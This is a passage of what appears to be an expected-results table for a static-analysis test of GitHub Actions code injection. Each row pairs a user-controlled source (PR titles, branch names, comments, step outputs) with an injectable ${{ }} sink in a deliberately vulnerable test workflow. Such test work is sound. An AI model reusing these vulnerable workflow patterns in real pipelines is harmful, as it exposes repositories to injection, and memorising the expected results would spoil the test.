| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ 